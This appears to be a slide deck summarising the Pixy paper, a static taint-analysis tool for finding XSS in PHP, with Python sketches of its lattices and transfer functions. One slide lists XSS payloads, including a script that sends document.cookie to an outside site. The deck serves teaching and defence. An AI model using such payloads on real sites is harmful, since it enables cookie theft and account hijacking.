
Pixy: A Static Analysis Tool for Detecting Web Application Vulnerabilities
Nenad Jovanovic, Christopher Kruegel, Engin Kirda

Secure Systems Lab, Vienna University of Technology

Proceedings of the IEEE Symposium on Security and Privacy (May 2006)

2008/10/2

Outline

- Introduction
- Taint-Style Vulnerabilities
- Data Flow Analysis
- Empirical Results
- Conclusions
- Comments


Introduction (1/2)

- There is an urgent need for automated vulnerability detection in Web application development.
- Existing approaches for mitigating threats to Web applications can be divided into client-side and server-side solutions.
- Server-side solutions:
  - Static approaches: scan the source code for vulnerabilities
  - Dynamic approaches: detect vulnerabilities while executing the audited program


Introduction (2/2)

- Pixy: the first open-source tool for statically detecting XSS vulnerabilities in PHP 4 code by means of data flow analysis
- It can also be applied to other taint-style vulnerabilities such as SQL injection or command injection
- http://pixybox.seclab.tuwien.ac.at/pixy/index.php


Taint-Style Vulnerabilities (1/2)

- Of all vulnerabilities in Web applications, problems caused by unchecked input are recognized as the most common
  - Attackers inject malicious data into Web applications
  - Attackers manipulate applications using this malicious data
- The authors refer to this class of vulnerabilities as the tainted object propagation problem
  - Term referenced from "Finding security errors in Java programs with static analysis," in Proceedings of the 14th USENIX Security Symposium, Aug. 2005


Taint-Style Vulnerabilities (2/2)

Tainted data:
- Originates from potentially malicious users
- Causes security problems at vulnerable points in the program (called sensitive sinks)
- May enter the program at specific places, and can spread via assignments and similar constructs
- Can be untainted (sanitized) using a set of operations

Many important types of vulnerabilities (e.g., XSS or SQL injection) can be seen as instances of this general class of taint-style vulnerabilities. They differ only with respect to the concrete values of a few parameters.


Cross-Site Scripting (XSS) (1/2)

- Occurs when dynamically generated Web pages display improperly validated input
- An attacker may embed malicious JavaScript code into dynamically generated pages of trusted sites in order to:
  - hijack user account credentials
  - change user settings
  - steal cookies
  - insert unwanted content into the page


Cross-Site Scripting (XSS) (2/2)

- Reflected cross-site scripting attacks
- Stored cross-site scripting attacks: an attacker's malicious script is rendered more than once

Example payloads:

<script>alert('Hello World');</script>

<a href="/usercp.php?action=logout">A web page about rabbits</a>

<script>location.replace('http://rickspage.com/?secret='+document.cookie)</script>


Properties of XSS

- Entry points into the program
  - GET: $_GET
  - POST: $_POST
  - COOKIE: $_COOKIE
  - The set of entry points grows when "register_globals" is active
- Sanitization routines: htmlentities(), htmlspecialchars(), and type casts
- Sensitive sinks: echo(), print(), printf(), …
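The three parameters listed above (entry points, sanitization routines, sensitive sinks) are what distinguishes one taint-style vulnerability class from another, so they can be written down as plain data. The following is a minimal sketch in Python, not Pixy's actual configuration format; the names `TaintSpec`, `XSS`, and `is_violation` are hypothetical, and only the listed values come from the slide.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class TaintSpec:
    """Parameters of one taint-style vulnerability class (hypothetical name)."""
    entry_points: frozenset  # where tainted data enters the program
    sanitizers: frozenset    # operations that untaint a value
    sinks: frozenset         # sensitive sinks that must not receive tainted data


# Values taken from the slide; "(int)" stands in for "type casts".
XSS = TaintSpec(
    entry_points=frozenset({"$_GET", "$_POST", "$_COOKIE"}),
    sanitizers=frozenset({"htmlentities", "htmlspecialchars", "(int)"}),
    sinks=frozenset({"echo", "print", "printf"}),
)


def is_violation(spec, sink, argument_tainted):
    """A violation is a tainted argument arriving at a sensitive sink."""
    return sink in spec.sinks and argument_tainted
```

Another vulnerability class such as SQL injection would reuse the same structure with different values.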


Data Flow Analysis (1/4)

- Goal: determine whether tainted data can reach sensitive sinks without being properly sanitized
  - Identify the taint value of the variables used in these sinks
- Statically compute certain information for every single program point (or for coarser units such as functions)
- PHP front-end
  - Constructs a parse tree for the PHP input file
  - The parse tree is transformed into a linearized form resembling three-address code (TAC) and kept as a control flow graph for each encountered function
  - TAC is an assembly-like language with at most 3 operands per statement: "x = y op z"
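To illustrate the linearization step, here is a small sketch that turns one nested assignment into three-address code. It is an assumption-laden toy: it parses Python syntax with Python's standard `ast` module instead of PHP, handles only the four basic arithmetic operators, and the function name `to_tac` and the temporaries `t1`, `t2`, … are made up for illustration.

```python
import ast
import itertools

# Operator node types supported by this sketch.
OPS = {ast.Add: "+", ast.Sub: "-", ast.Mult: "*", ast.Div: "/"}


def to_tac(source):
    """Linearize one assignment such as 'x = a + b * c' into TAC lines."""
    assign = ast.parse(source).body[0]
    target = assign.targets[0].id
    code = []
    temps = itertools.count(1)

    def operand(node):
        """Return a name or literal for node, emitting temporaries if needed."""
        if isinstance(node, ast.Name):
            return node.id
        if isinstance(node, ast.Constant):
            return repr(node.value)
        if isinstance(node, ast.BinOp):
            left = operand(node.left)
            right = operand(node.right)
            temp = f"t{next(temps)}"
            code.append(f"{temp} = {left} {OPS[type(node.op)]} {right}")
            return temp
        raise ValueError("unsupported expression")

    top = assign.value
    if isinstance(top, ast.BinOp):
        left = operand(top.left)
        right = operand(top.right)
        code.append(f"{target} = {left} {OPS[type(top.op)]} {right}")
    else:
        code.append(f"{target} = {operand(top)}")
    return code
```

For `x = a + b * c` this yields `t1 = b * c` followed by `x = a + t1`, so every statement has at most three operands.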


Data Flow Analysis (2/4)

- Operates on the control flow graph (CFG) of a program
  - A data structure built on top of the intermediate code representation, abstracting the control flow behavior of a function that is being compiled
  - Node: an atomic statement of the program
  - Edge: flow of control
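A CFG of this kind can be sketched with a very small data structure. The class `CfgNode`, the helper `reachable`, and the four example statements are hypothetical and only meant to show nodes as atomic statements and edges as flow of control.

```python
class CfgNode:
    """One atomic statement plus its outgoing control flow edges."""

    def __init__(self, statement):
        self.statement = statement
        self.successors = []

    def add_edge(self, other):
        self.successors.append(other)


def reachable(entry):
    """Return the statements of all nodes reachable from entry (depth-first)."""
    seen, order, stack = set(), [], [entry]
    while stack:
        node = stack.pop()
        if id(node) in seen:
            continue
        seen.add(id(node))
        order.append(node.statement)
        stack.extend(reversed(node.successors))
    return order


# CFG of: if (t1) { v = 3 } else { v = 4 }  echo v
branch = CfgNode("if t1")
then_node = CfgNode("v = 3")
else_node = CfgNode("v = 4")
join_node = CfgNode("echo v")
branch.add_edge(then_node)
branch.add_edge(else_node)
then_node.add_edge(join_node)
else_node.add_edge(join_node)
```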


Literal Analysis: Basics

- Purpose: determine, for each program point, the literal that a variable or a constant can hold
- Can improve the precision of the overall analysis by:
  - Evaluating branch conditions
  - Ignoring program paths that cannot be executed at runtime (called path pruning)
  - Resolving non-literal include statements, variable variables, variable array indices, and variable function calls (only for potential uses)
- After performing literal analysis, each CFG node is associated with information about which literal is mapped to a variable before executing that node


How Data Flow Analysis is Used to Perform Literal Analysis

- Assume a fictitious programming language with:
  - One variable (v)
  - Two literals (the integers 3 and 4)
- "skip" node: empty instruction
- "Ω": unknown literal


Data Flow Analysis (3/4)

Carrier lattice:
- Information about the program is represented using values from an algebraic structure
- Every piece of information that could ever be associated with a CFG node by the analysis must be contained as an element of the lattice used
- Bottom element: "not visited yet", the value at the beginning
- Line (in the lattice diagram): ordering between elements with regard to precision
- Least upper bound: the smallest element that is greater than or equal to both of the elements; needed by the analysis algorithm
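For the fictitious one-variable language, the carrier lattice can be sketched as a flat lattice: bottom below the literals, Ω above them. The encoding below (string sentinels, integer literals, the helper names `lub` and `leq`) is an assumption of this sketch, not the paper's notation.

```python
BOTTOM = "bottom"  # "not visited yet"
OMEGA = "omega"    # unknown literal (top element)


def lub(a, b):
    """Least upper bound of two lattice elements."""
    if a == BOTTOM:
        return b
    if b == BOTTOM:
        return a
    if a == b:
        return a
    return OMEGA  # two different literals: the literal is unknown


def leq(a, b):
    """Ordering derived from lub: a is below b iff joining them yields b."""
    return lub(a, b) == b
```

Joining the literals 3 and 4 gives Ω, which is how the analysis records that a variable may hold different values along different paths.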


Data Flow Analysis (4/4)

Transfer function:
- f: P → P for each node in the control flow graph
  - Input: a lattice element
  - Output: a lattice element
- Models the effect of the node on the program information
- Each CFG node is associated with such a transfer function
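Lattice, transfer functions, and CFG combine into a fixpoint computation. The sketch below runs a simple worklist algorithm over the fictitious language (one variable v, literals 3 and 4, "skip" nodes). The CFG, the node numbering, and the function names are made up for this example, and the worklist strategy is a generic textbook one rather than a description of Pixy's implementation.

```python
BOTTOM, OMEGA = "bottom", "omega"


def lub(a, b):
    """Least upper bound on the flat literal lattice."""
    if a == BOTTOM:
        return b
    if b == BOTTOM:
        return a
    return a if a == b else OMEGA


def transfer(statement, value_in):
    """Effect of one node on the literal mapped to v."""
    if value_in == BOTTOM:       # node not reached yet: nothing to propagate
        return BOTTOM
    if statement == "skip":      # empty instruction leaves v unchanged
        return value_in
    return int(statement.split("=")[1])  # statement of the form "v = <int>"


def analyze(statements, edges, entry=0):
    """Return the literal of v before each node, computed as a fixpoint."""
    before = {node: BOTTOM for node in statements}
    before[entry] = OMEGA        # v is unknown at program start
    worklist = [entry]
    while worklist:
        node = worklist.pop()
        out = transfer(statements[node], before[node])
        for succ in edges.get(node, []):
            merged = lub(before[succ], out)
            if merged != before[succ]:
                before[succ] = merged
                worklist.append(succ)
    return before


# if (...) v = 3 else v = 4;  skip;  v = 3;  skip
statements = {0: "skip", 1: "v = 3", 2: "v = 4", 3: "skip", 4: "v = 3", 5: "skip"}
edges = {0: [1, 2], 1: [3], 2: [3], 3: [4], 4: [5]}
result = analyze(statements, edges)
```

After the branch (node 3) the two literals merge to Ω, while the later assignment makes v a known literal again at node 5.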


Literal Analysis: Basics

Carrier lattice definition:
- Provides mappings for all variables and constants that appear in the scanned program
- Able to describe the mapping to any possible literal (infinitely many)


Literal Analysis: Basics

Transfer function definition:
- PHP has no explicit type declarations
- "Hidden" arrays


Four cases in order of increasing complexity

1. Not an array element and not known as an array: strong update
2. An array, but not an array element: array tree
3. An array element without non-literal indices (may be an array): strong overlap


Four cases in order of increasing complexity

4. An array element with non-literal indices, which may itself be an array: weak overlap
   - Weak overlap algorithm: all overwrite operations are replaced by least upper bound operations
- Array elements with one or more non-literal indices are permanently mapped to Ω
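The difference between overwriting (strong) and joining (weak) can be sketched on a flattened abstract state. This is a simplification under stated assumptions: the state is a plain dictionary keyed by (array, index) pairs instead of Pixy's array tree, only one index level is modeled, and the function name `assign_element` is hypothetical.

```python
OMEGA = "omega"  # unknown literal, also used for a non-literal index


def lub(a, b):
    """Least upper bound of two literals (bottom omitted in this sketch)."""
    return a if a == b else OMEGA


def assign_element(state, array, index, value):
    """Abstract effect of `$array[index] = value` on a flat state.

    index is an integer literal, or OMEGA when the index is not a literal.
    """
    new_state = dict(state)
    if index != OMEGA:
        # Literal index: exactly one element is hit, so overwrite it.
        new_state[(array, index)] = value
    else:
        # Non-literal index: any element may be hit, so every overwrite
        # becomes a least upper bound with the old value.
        for key, old in state.items():
            if key[0] == array:
                new_state[key] = lub(old, value)
    return new_state


state = {("a", 0): 1, ("a", 1): 2, ("b", 0): 5}
strong = assign_element(state, "a", 1, 7)
weak = assign_element(state, "a", OMEGA, 1)
```

In the weak case the element that already held 1 keeps its literal, the element that held 2 becomes Ω, and the unrelated array `b` is untouched.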


Alias Analysis

- Ignoring alias relationships would prevent literal analysis from producing correct results in a number of cases
- Without alias analysis, literal analysis cannot determine that an assignment to $a also affects $b
  - $b would remain unchanged, which is incorrect
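The effect can be reproduced with a toy abstract assignment. The sketch assumes the PHP fragment `$a = 1; $b = &$a; $a = 2;` and models only must-aliases; the function name `assign` and the state layout are hypothetical.

```python
def assign(literals, alias_groups, var, value):
    """Abstract effect of `$var = value`, propagated to all must-aliases."""
    new_literals = dict(literals)
    new_literals[var] = value
    for group in alias_groups:
        if var in group:
            for alias in group:
                new_literals[alias] = value
    return new_literals


# State after `$a = 1; $b = &$a;`
literals = {"a": 1, "b": 1}

# Now analyze `$a = 2;` with and without alias information.
with_aliases = assign(literals, [{"a", "b"}], "a", 2)
without_aliases = assign(literals, [], "a", 2)
```

Only the first variant records that `$b` now holds 2; the second leaves `$b` at 1, which does not match what PHP does at runtime.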


Carrier lattice definition:
- Alias group: a group of variables referencing the same memory location
- Alias information is modeled through sets of alias group sets
  - (…): an alias group
  - {…}: an alias group set
- Must-aliases of a variable: in "{(a,b) (c)}", $b is a must-alias of $a
- May-aliases of a variable: in "{(a,b) (c)} {(a,c) (b)}", $b and $c are may-aliases of $a
- The order among lattice elements is defined as subset inclusion
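The two examples can be checked with a small encoding of alias group sets as nested frozensets. The helper names are hypothetical, and this sketch assumes one particular reading of the definitions: a must-alias shares a group with the variable in every alias group set, a may-alias in at least one but not all. Because the order is subset inclusion, the least upper bound of two lattice elements is their union.

```python
def group_set(*groups):
    """Build one alias group set, e.g. group_set(("a", "b"), ("c",))."""
    return frozenset(frozenset(group) for group in groups)


def aliases_in(gs, var):
    """Variables sharing a group with var inside one alias group set."""
    for group in gs:
        if var in group:
            return set(group) - {var}
    return set()


def must_aliases(element, var):
    """Aliased with var in every alias group set of the lattice element."""
    per_set = [aliases_in(gs, var) for gs in element]
    return set.intersection(*per_set) if per_set else set()


def may_aliases(element, var):
    """Aliased with var in some, but not all, alias group sets."""
    per_set = [aliases_in(gs, var) for gs in element]
    return set().union(*per_set) - must_aliases(element, var)


def join(e1, e2):
    """Least upper bound under subset inclusion: set union."""
    return frozenset(e1) | frozenset(e2)


one_path = frozenset({group_set(("a", "b"), ("c",))})
other_path = frozenset({group_set(("a", "c"), ("b",))})
merged = join(one_path, other_path)
```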


- Static analysis is not able to decide which path the program will take
  - Under the assumption that the condition is determined by dynamic factors
  - E.g., environment variables, user input


Transfer function definition

- Reference assignment: "$a = & $b"
- Unset node: the variable gets its own one-element alias group for each alias group set
- Global node ("global $a;"): handled like a reference assignment with the equally named variable from the global scope on the right side
- The authors only consider references to simple variables
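The reference assignment and unset transfer functions can be sketched on the nested-frozenset encoding of alias group sets. This is an illustrative reading of the slide, not Pixy's code: the function names are hypothetical, and only simple variables are handled, matching the restriction stated above.

```python
def remove_var(gs, var):
    """Take var out of whatever group it is in; drop groups left empty."""
    remaining = set()
    for group in gs:
        rest = group - {var}
        if rest:
            remaining.add(frozenset(rest))
    return remaining


def reference_assign(element, left, right):
    """Abstract effect of `$left = &$right` on every alias group set."""
    if left == right:
        return frozenset(element)
    result = set()
    for gs in element:
        groups = remove_var(gs, left)
        # left joins the group that contains right.
        result.add(frozenset(g | {left} if right in g else g for g in groups))
    return frozenset(result)


def unset(element, var):
    """Abstract effect of `unset($var)`: var gets its own one-element group."""
    return frozenset(
        frozenset(remove_var(gs, var) | {frozenset({var})}) for gs in element
    )


# Initially no variable is aliased with any other: {(a) (b) (c)}
start = frozenset({frozenset({frozenset({"a"}), frozenset({"b"}), frozenset({"c"})})})
after_ref = reference_assign(start, "a", "b")   # {(a,b) (c)}
after_unset = unset(after_ref, "a")             # back to {(a) (b) (c)}
```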


Literal Analysis Revisited

- Here we only consider references to simple variables
- Functions built into PHP are conservatively modeled as returning Ω, since the increase in precision from modeling them is expected to be rather small
  - The only built-in function modeled precisely is "define"


Literal Analysis Revisited

- The transfer function at the call preparation node stores the alias information for the local variables of the calling function and resets it to its default (initial) value
- On function return (i.e., at the call return node), the alias information for the local variables of the callee is reset to its default, while the caller's locals are restored


Taint Analysis

- Purpose: determine, for each program point, the taint value (instead of the literal) of a variable or constant
- This makes it possible to inspect whether any sensitive sink in the program receives malicious data, and hence to detect vulnerabilities


Taint Analysis: Carrier Lattice Definition

- Tainted: a variable is tainted if it can hold a malicious, not yet sanitized (checked) value originating from user input
- Variables are mapped not to Ω but to the taint values tainted and untainted
  - Mapped to tainted: this variable might be tainted
  - Mapped to untainted: this variable is untainted
  - Whenever the analysis cannot determine the taint value, the variable is conservatively assumed to be tainted


Taint Analysis: Transfer Functions Definition

- Casting a tainted variable to an integer untaints it (implicitly with unary operators such as + and -, or explicitly with (int))
- Correctly modeling built-in PHP functions can reduce the number of false positives
  - Pixy processes a specification file on startup that contains abstracted versions of some built-in functions in PHP syntax
  - "htmlentities" and "array" return $_UNTAINTED
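A taint transfer function along these lines can be sketched for a handful of TAC-like statement kinds. The statement encoding, the dictionary `BUILTIN_RESULT` (a stand-in for the specification file, whose real format is not shown here), and the choice to treat unmodeled functions as returning tainted are assumptions of this sketch.

```python
TAINTED, UNTAINTED = "tainted", "untainted"

ENTRY_POINTS = {"$_GET", "$_POST", "$_COOKIE"}
# Hypothetical stand-in for the built-in function specification.
BUILTIN_RESULT = {"htmlentities": UNTAINTED, "array": UNTAINTED}


def lub(a, b):
    """Joining taint values: tainted wins."""
    return TAINTED if TAINTED in (a, b) else UNTAINTED


def taint_of(state, operand):
    """Taint of an operand; unknown variables are conservatively tainted."""
    if operand in ENTRY_POINTS:
        return TAINTED
    return state.get(operand, TAINTED)


def transfer(state, statement):
    """Abstract effect of one statement (target, op, args) on the taint state."""
    target, op, args = statement
    new_state = dict(state)
    if op == "const" or op == "(int)":
        new_state[target] = UNTAINTED            # literals and integer casts
    elif op == "copy":
        new_state[target] = taint_of(state, args[0])
    elif op == "concat":
        new_state[target] = lub(taint_of(state, args[0]), taint_of(state, args[1]))
    elif op == "call":
        # Assumption: functions without a specification return tainted.
        new_state[target] = BUILTIN_RESULT.get(args[0], TAINTED)
    else:
        new_state[target] = TAINTED              # unknown operation
    return new_state


program = [
    ("$x", "copy", ["$_GET"]),
    ("$y", "call", ["htmlentities", "$x"]),
    ("$z", "concat", ["$y", "$x"]),
    ("$n", "(int)", ["$x"]),
]
state = {}
for statement in program:
    state = transfer(state, statement)
```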


Taint Analysis

Using the analysis results:
- Generating warnings that point the developer to possible XSS vulnerabilities at the end of the analysis is straightforward
  - The analysis information for each sensitive sink is searched for tainted input variables
  - A warning message indicating the corresponding line is issued if such a violation is discovered
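The reporting step can be sketched as a single pass over the sensitive sinks. The input layout (a list of sink calls and a per-line taint mapping), the function name `find_warnings`, and the wording of the message are hypothetical; Pixy's actual output format is not reproduced here.

```python
def find_warnings(sink_calls, taint_before):
    """Report every sensitive sink that receives a possibly tainted variable.

    sink_calls:   list of (line, sink_name, [variables passed to the sink])
    taint_before: line -> {variable: "tainted" | "untainted"}
    """
    warnings = []
    for line, sink, variables in sink_calls:
        info = taint_before.get(line, {})
        # Variables without analysis information are conservatively tainted.
        tainted = [v for v in variables if info.get(v, "tainted") == "tainted"]
        if tainted:
            names = ", ".join(tainted)
            warnings.append(f"line {line}: possible XSS, {sink}() receives tainted {names}")
    return warnings


sink_calls = [(10, "echo", ["$x"]), (12, "echo", ["$y"]), (15, "print", ["$y", "$z"])]
taint_before = {
    10: {"$x": "tainted"},
    12: {"$y": "untainted"},
    15: {"$y": "untainted", "$z": "tainted"},
}
warnings = find_warnings(sink_calls, taint_before)
```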


Limitations

- Pixy does not support the object-oriented features of PHP
  - The analysis assumes that malicious data can never arise from such constructs
- Files included with "include" and similar keywords are not scanned automatically
  - The authors frequently observed false positives stemming from these missing file inclusions
  - These were eliminated through manual inclusion


Empirical Results


Conclusions

- A flow-sensitive, interprocedural, and context-sensitive data flow analysis for PHP, targeted at detecting taint-style vulnerabilities
- Additional literal analysis and alias analysis to improve the correctness and precision of the taint analysis
- Pixy, an open-source Java tool that implements these analysis techniques
- Experimental validation of Pixy's ability to detect unknown vulnerabilities with a low false positive rate


Comments

- The first to perform alias analysis for an untyped, reference-based scripting language such as PHP
- Beyond the scope of the paper:
  - Recursive calls depend on dynamic information
  - Infinite call depth for non-terminating programs
- The implementation is widely used by the public
- Future work: automatic inclusion of "include" files